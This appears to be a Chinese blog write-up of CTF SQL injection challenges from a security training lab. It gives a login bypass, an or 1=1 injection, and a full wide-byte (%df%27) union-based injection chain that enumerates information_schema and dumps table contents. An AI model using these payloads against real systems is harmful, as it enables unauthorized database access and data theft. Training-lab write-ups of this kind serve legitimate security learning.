1. 程式人生 > >網安實驗室CTF 注入篇

網安實驗室CTF 注入篇

使用者名稱輸入 admin’ or ‘1’=’1 實現繞過。

頁面沒有輸入框,檢視原始碼,發現tips:id=1
說明 url?id=1處存在注入點。新增‘ 報錯,於是考慮構造
?id=1 or 1=1永真語句
成功注入拿到flag

3.防注入
地址http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php
同樣的發現id=1處存在注入點。這裡同樣考慮構造or 1=1
發現無法注入。
抓包檢視響應頭,發現是gb2313編碼。考慮可能是寬位元組注入(這裡是看了別人的部落格)
這裡寫圖片描述
輸入%df%27 報錯。
%df%27%20and%201=1%23 返回正常。
%df%27 order by 3%23 返回正常 即欄位長度為3
%df%27%20union%20select%201,2,3%23 返回2,3
%df%27%20union%20select%201,2,database()%23
爆出:
2
資料庫名:mydbs

%df%27 and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata%23
爆出:
information_schema,mydbs,test
3
mydbs 轉換成十六進位制為0x6D79646273

%df%27 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x6D79646273%23
爆出:
2
sae_user_sqli4

sae_user_sqli4轉換成十六進位制為0x7361655F757365725F73716C6934

%df%27 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7361655F757365725F73716C6934%23
爆出:
id,title_1,content_1
3
猜測flag值在content_1內

%df%27 and 1=2 union select 1,group_concat(content_1,0x3b),3 from sae_user_sqli4%23
爆出:
my blog test;,easy ;,flag值手動打碼= =;,flag is here!;
3